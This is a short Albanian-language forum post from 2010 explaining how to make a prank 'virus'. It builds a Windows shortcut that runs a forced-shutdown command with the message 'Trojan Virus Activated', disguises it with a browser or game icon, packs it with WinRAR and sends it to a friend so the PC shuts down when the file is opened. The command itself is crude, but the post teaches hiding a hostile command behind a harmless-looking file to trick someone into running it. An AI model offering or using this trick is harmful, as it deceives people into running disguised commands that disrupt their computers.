Si ta krioim nje Shourt per Fikjen e PC's

  Share
  avatar
  ak47***
  Administrator
  Administrator

  Male Age : 23
  Poenat : 806
  Reputacioni : 6
  Vendndodhja : AHT-Crews
  Numri i postimeve : 300

  Si ta krioim nje Shourt per Fikjen e PC's

  Mesazh nga ak47*** prej Sat Jan 23, 2010 8:32 pm

  se parii krijon nje shortcut edhe pastaj e hapet nje tabel dhee e shenon attyyy pa thonjeza "shutdown -s -t 20 -c "Trojan Virus Activated" edhe e shenon emrin psh internet explorer edhe ja ndrron ikonen dhee e bon me winrar edhe ja qon ndonje shokuu dhee pastaj pasii qi ta bonn extract aiii dhe do klikoj mbii tee virusi per 20 sekonda do ti infektohet mund ta beniii me qfaro do ikonee psh loja muzik etj... kalofshi mir


  __________________________________________________________________________________________________________
  [You must be registered and logged in to see this image.]

   Ora është Sun Dec 16, 2018 5:45 pm